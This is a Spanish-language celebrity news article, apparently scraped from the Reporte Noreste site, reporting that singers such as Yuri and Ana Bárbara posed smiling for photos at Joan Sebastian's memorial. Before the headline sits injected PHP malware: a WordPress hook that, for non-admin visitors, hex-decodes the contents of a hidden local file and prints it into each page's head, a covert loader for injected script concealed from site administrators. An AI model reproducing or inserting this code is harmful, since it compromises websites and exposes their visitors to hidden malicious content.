if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ¡No hay respeto! Cantantes se toman fotos en velorio – Reporte Noreste
Conéctate con nosotros

Durante el homenaje de cuerpo presente que realizó la sociedad de autores y compositores a Joan Sebastian en la explanada del centro cultural Roberto Cantoral, varias cantantes aprovecharon para tomarse algunas fotografías  y subirlas a sus redes sociales olvidando el motivo por el cual se encontraban reunidas.

Yuri, Ana Bárbara, Lucia Méndez, Maribel Guardia, y Cynthia Urías fueron algunas de las famosas que aprovecharon esta ocasión para posar muy sonrientes ante las cámaras mostrando un contraste entre su comportamiento y la tristeza de los fans que se encontraban en las afueras del recinto.

En mencionado homenaje participaron conductores, músicos, familiares y sobre todo un gran número de seguidores que acudieron a despedir al cantante que falleció la tarde del lunes a causa de algunas complicaciones derivadas del cáncer de huesos que padecía desde hace algunos años atrás.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en CYEN